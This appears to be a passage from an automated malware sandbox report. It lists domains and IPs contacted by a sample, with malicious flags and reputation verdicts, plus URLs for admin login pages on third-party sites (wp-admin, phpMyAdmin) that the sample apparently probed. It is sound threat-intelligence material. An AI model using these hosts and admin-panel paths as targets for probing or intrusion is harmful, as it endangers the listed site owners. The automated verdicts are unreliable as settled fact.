                                            truefalseunknown
                                            la-morada.com
                                            3.64.163.50
                                            truetrueunknown
                                            mail.aryainstrument.com
                                            212.33.197.94
                                            truefalseunknown
                                            malibusands.net
                                            15.197.142.173
                                            truetrue
                                              unknown
                                              dune-architecture.be
                                              213.186.33.87
                                              truefalseunknown
                                              reign.dk
                                              46.30.215.254
                                              truefalseunknown
                                              neugear.ca
                                              192.185.88.100
                                              truetrueunknown
                                              smtp.azarkavin.com
                                              193.141.65.97
                                              truefalse
                                                unknown
                                                www.attineos-cyber.com
                                                137.74.230.137
                                                truefalse
                                                  unknown
                                                  stualialuyastrelia.net
                                                  91.215.85.17
                                                  truetrueunknown
                                                  mail.frametalent.it
                                                  62.149.128.166
                                                  truefalse
                                                    unknown
                                                    manizan.com
                                                    188.0.240.130
                                                    truetrueunknown
                                                    humydrole.com
                                                    186.182.55.44
                                                    truetrueunknown
                                                    mgnbizlaw-com.mail.protection.outlook.com
                                                    52.101.9.5
                                                    truefalse
                                                      high
                                                      mx1.pub.mailpod9-cph3.one.com
                                                      185.164.14.118
                                                      truefalse
                                                        high
                                                        dunearchitecture-be01b.mail.protection.outlook.com
                                                        52.101.68.5
                                                        truefalse
                                                          high
                                                          gwmail.pfprojekt.sk
                                                          195.68.234.252
                                                          truetrue
                                                            unknown
                                                            mx1.forwardemail.net
                                                            138.197.213.185
                                                            truefalseunknown
                                                            estbest.ee
                                                            185.31.240.240
                                                            truetrueunknown
                                                            nihcesxway.hub.nih.gov
                                                            128.231.90.123
                                                            truefalse
                                                              high
                                                              attineos.com
                                                              137.74.230.137
                                                              truefalseunknown
                                                              ext.by
                                                              178.172.160.19
                                                              truetrueunknown
                                                              www.finaleasing.it
                                                              89.46.109.16
                                                              truefalseunknown
                                                              www.slovtain.sk
                                                              85.248.130.200
                                                              truefalseunknown
                                                              aspmx5.googlemail.com
                                                              142.250.153.26
                                                              truefalseunknown
                                                              mx2.spaceweb.ru
                                                              77.222.41.95
                                                              truefalse
                                                                high
                                                                slovtain.sk
                                                                85.248.130.200
                                                                truefalseunknown
                                                                moraci.it
                                                                84.33.37.184
                                                                truefalse
                                                                  unknown
                                                                  mail.evstratov.de
                                                                  85.13.148.22
                                                                  truefalse
                                                                    unknown
                                                                    aceservice-fr0i.mail.protection.outlook.com
                                                                    104.47.25.36
                                                                    truefalse
                                                                      high
                                                                      mgnbizlaw.com
                                                                      3.33.130.190
                                                                      truetrue
                                                                        unknown
                                                                        khodyari.com
                                                                        172.67.204.29
                                                                        truefalse
                                                                          unknown
                                                                          eremina.net
                                                                          188.120.236.18
                                                                          truetrue
                                                                            unknown
                                                                            entodo.net
                                                                            54.203.56.53
                                                                            truetrue
                                                                              unknown
                                                                              mail.la-morada.com
                                                                              3.64.163.50
                                                                              truetrue
                                                                                unknown
                                                                                lb.yelo.red
                                                                                54.203.56.53
                                                                                truefalse
                                                                                  unknown
                                                                                  mail.manizan.com
                                                                                  116.203.110.116
                                                                                  truefalse
                                                                                    unknown
                                                                                    alt4.aspmx.l.google.com
                                                                                    142.250.153.27
                                                                                    truefalse
                                                                                      high
                                                                                      smtp.secureserver.net
                                                                                      216.69.141.81
                                                                                      truefalse
                                                                                        high
                                                                                        jumpnsplashwear.com
                                                                                        66.96.160.144
                                                                                        truefalse
                                                                                          unknown
                                                                                          mail.finaleasing.it
                                                                                          62.149.128.151
                                                                                          truefalse
                                                                                            unknown
                                                                                            mail.moraci.it
                                                                                            84.33.37.184
                                                                                            truefalse
                                                                                              unknown
                                                                                              aryainstrument.com
                                                                                              78.39.50.180
                                                                                              truefalse
                                                                                                unknown
                                                                                                www.frametalent.it
                                                                                                89.46.108.68
                                                                                                truefalse
                                                                                                  unknown
                                                                                                  fadeev.com
                                                                                                  77.222.40.129
                                                                                                  truefalse
                                                                                                    unknown
                                                                                                    mail.doriangrey.ru
                                                                                                    62.113.86.42
                                                                                                    truefalse
                                                                                                      unknown
                                                                                                      moradfarag.com
                                                                                                      50.87.151.30
                                                                                                      truetrue
                                                                                                        unknown
                                                                                                        elohin.com
                                                                                                        207.150.200.133
                                                                                                        truefalse
                                                                                                          unknown
                                                                                                          mx2.forwardemail.net
                                                                                                          104.248.224.170
                                                                                                          truefalse
                                                                                                            unknown
                                                                                                            pop3.evstratov.de
                                                                                                            85.13.148.22
                                                                                                            truefalse
                                                                                                              unknown
                                                                                                              liuliuoumumy.org
                                                                                                              34.143.166.163
                                                                                                              truetrue
                                                                                                                unknown
                                                                                                                mailgate.reign.dk
                                                                                                                46.30.215.254
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  relay.evstratov.de
                                                                                                                  85.13.148.22
                                                                                                                  truefalse
                                                                                                                    unknown
                                                                                                                    ershov.org
                                                                                                                    81.177.24.84
                                                                                                                    truetrue
                                                                                                                      unknown
                                                                                                                      nihcesxwayst04.hub.nih.gov
                                                                                                                      165.112.13.42
                                                                                                                      truefalse
                                                                                                                        high
                                                                                                                        datasense.fr
                                                                                                                        144.217.97.206
                                                                                                                        truetrue
                                                                                                                          unknown
                                                                                                                          pop.evropskypravnik.cz
                                                                                                                          81.31.35.50
                                                                                                                          truetrue
                                                                                                                            unknown
                                                                                                                            www.dune-architecture.be
                                                                                                                            213.186.33.87
                                                                                                                            truefalse
                                                                                                                              unknown
                                                                                                                              evropskypravnik.cz
                                                                                                                              81.31.35.50
                                                                                                                              truetrue
                                                                                                                                unknown
                                                                                                                                ghs.google.com
                                                                                                                                142.251.167.121
                                                                                                                                truefalse
                                                                                                                                  high
                                                                                                                                  aspmx4.googlemail.com
                                                                                                                                  142.250.27.26
                                                                                                                                  truefalse
                                                                                                                                    unknown
                                                                                                                                    atozrental.cc
                                                                                                                                    211.119.84.112
                                                                                                                                    truetrue
                                                                                                                                      unknown
                                                                                                                                      mx.frametalent.it
                                                                                                                                      62.149.128.163
                                                                                                                                      truefalse
                                                                                                                                        unknown
                                                                                                                                        mx.yandex.ru
                                                                                                                                        77.88.21.249
                                                                                                                                        truefalse
                                                                                                                                          high
                                                                                                                                          alt1.aspmx.l.google.com
                                                                                                                                          209.85.202.27
                                                                                                                                          truefalse
                                                                                                                                            high
                                                                                                                                            frametalent.it
                                                                                                                                            89.46.108.68
                                                                                                                                            truetrue
                                                                                                                                              unknown
                                                                                                                                              conceptualintegration.com
                                                                                                                                              66.115.173.188
                                                                                                                                              truetrue
                                                                                                                                                unknown
                                                                                                                                                aspmx2.googlemail.com
                                                                                                                                                209.85.202.26
                                                                                                                                                truefalse
                                                                                                                                                  unknown
                                                                                                                                                  mail.slovtain.sk
                                                                                                                                                  109.74.157.111
                                                                                                                                                  truefalse
                                                                                                                                                    unknown
                                                                                                                                                    3marc.com
                                                                                                                                                    69.160.38.2
                                                                                                                                                    truetrue
                                                                                                                                                      unknown
                                                                                                                                                      alt3.aspmx.l.google.com
                                                                                                                                                      142.250.27.26
                                                                                                                                                      truefalse
                                                                                                                                                        high
                                                                                                                                                        mx.finaleasing.it
                                                                                                                                                        62.149.128.151
                                                                                                                                                        truefalse
                                                                                                                                                          unknown
                                                                                                                                                          blagotvoritel.org
                                                                                                                                                          87.121.166.194
                                                                                                                                                          truefalse
                                                                                                                                                            unknown
                                                                                                                                                            www.attineos.com
                                                                                                                                                            137.74.230.137
                                                                                                                                                            truefalse
                                                                                                                                                              unknown
                                                                                                                                                              snukerukeutit.org
                                                                                                                                                              104.198.2.251
                                                                                                                                                              truefalse
                                                                                                                                                                unknown
                                                                                                                                                                doriangrey.ru
                                                                                                                                                                62.113.86.42
                                                                                                                                                                truetrue
                                                                                                                                                                  unknown
                                                                                                                                                                  mx2.postmaster.hu
                                                                                                                                                                  80.249.168.152
                                                                                                                                                                  truefalse
                                                                                                                                                                    unknown
                                                                                                                                                                    NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                    http://bokod.hu/wp-login.phptrue
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://fedyanin.ws/wp-login.phpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://tonimiuyaytre.org/true
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://ershov.org/wp-admin/false
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://evropskypravnik.cz/wp-admin/true
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://evropskypravnik.cz/phpmyadmin/true
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://bokod.hu/phpMyAdmin/true
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://khodyari.com/administrator/index.phpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://mgnbizlaw.com/phpMyAdmin/false
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://eremina.net/phpmyadmin/true
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://3marc.com/phpMyAdmin/true
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://mcsmk8.com/wp-admin/false
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://la-morada.com/phpMyAdmin/true
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://bokod.hu/administrator/true
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://tyiuiunuewqy.org/true
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://3marc.com/pma/true
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://evropskypravnik.cz/admintrue
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://evropskypravnik.cz/phpMyAdmin/true
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://pfprojekt.sk/admintrue
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://www.pfprojekt.sk/admintrue
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://fedyanin.ws/wp-admin/false
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://eremina.net/wp-login.phptrue
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://jumpnsplashwear.com/phpMyAdmin/false
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://conceptualintegration.com/phpmyadmin/true
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://malibusands.net/admin.phptrue
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://pfprojekt.sk/phpmyadmin/true
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://khodyari.com/phpMyAdmin/false
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://khodyari.com/phpmyadmin/false
                                                                                                                                                                      unknown
                                                                                                                                                                      https://la-morada.com/phpmyadmin/true
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://atozrental.cc/atoz/index.phptrue
                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                      unknown
                                                                                                                                                                      http://pfprojekt.sk/phpMyAdmin/true
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://3marc.com/admin.phptrue
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://liuliuoumumy.org/true
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://3marc.com/wp-admin/true
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://evropskypravnik.cz/pma/true
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://malibusands.net/admintrue
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://malibusands.net/administrator/true
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://jumpnsplashwear.com/administrator/false
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://eremina.net/administrator/true
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://mgnbizlaw.com/phpmyadmin/false
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://eremina.net/administrator/index.phptrue
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.pfprojekt.sk/phpmyadmin/true
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://khodyari.com/administrator/false
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://jumpnsplashwear.com/PhpMyAdmin/false
                                                                                                                                                                        unknown
                                                                                                                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/sc/sctAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://tempuri.org/RestAPI/TreeObject2ResponseAppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://duckduckgo.com/ac/?q=AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2196495464.000000000973C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://word.office.comMexplorer.exe, 00000002.00000000.2198779085.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://tempuri.org/AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceAppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/faultAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsatAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://wns.windows.com/eexplorer.exe, 00000002.00000000.2196926681.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://api.ip.sb/ipAppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://www.ecosia.org/newtab/AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedAppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingAppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://outlook.comeexplorer.exe, 00000002.00000000.2198779085.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000002.00000000.2196926681.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsAppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              http://tempuri.org/RestAPI/TreeObject2ResponseDAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RenewAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2006/02/addressingidentityAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                        http://schemas.microexplorer.exe, 00000002.00000000.2193212740.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2195323423.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2195385347.0000000007B60000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertylAppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                              http://tempuri.org/DAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/06/addressingexAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceAppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseAppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                                      http://www.w3.oAppLaunch.exe, 0000000B.00000002.2626531999.0000000006D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                      51.81.56.229
                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                      16276OVHFRfalse
                                                                                                                                                                                                                                                                      69.160.38.2
                                                                                                                                                                                                                                                                      3marc.comUnited States
                                                                                                                                                                                                                                                                      20454SSASN2UStrue
                                                                                                                                                                                                                                                                      185.220.100.251
                                                                                                                                                                                                                                                                      unknownGermany
                                                                                                                                                                                                                                                                      205100F3NETZEDEfalse
                                                                                                                                                                                                                                                                      104.198.2.251
                                                                                                                                                                                                                                                                      snukerukeutit.orgUnited States
                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                      45.66.33.45
                                                                                                                                                                                                                                                                      unknownNetherlands
                                                                                                                                                                                                                                                                      47482SPECTRENLfalse
                                                                                                                                                                                                                                                                      185.241.208.163
                                                                                                                                                                                                                                                                      unknownMoldova Republic of
                                                                                                                                                                                                                                                                      26636GBTCLOUDUSfalse
                                                                                                                                                                                                                                                                      64.71.33.31
                                                                                                                                                                                                                                                                      mcsmk8.comUnited States
                                                                                                                                                                                                                                                                      3064AFFINITY-FTLUStrue
                                                                                                                                                                                                                                                                      34.94.245.237
                                                                                                                                                                                                                                                                      sumagulituyo.orgUnited States
                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                      15.197.142.173
                                                                                                                                                                                                                                                                      malibusands.netUnited States
                                                                                                                                                                                                                                                                      7430TANDEMUStrue
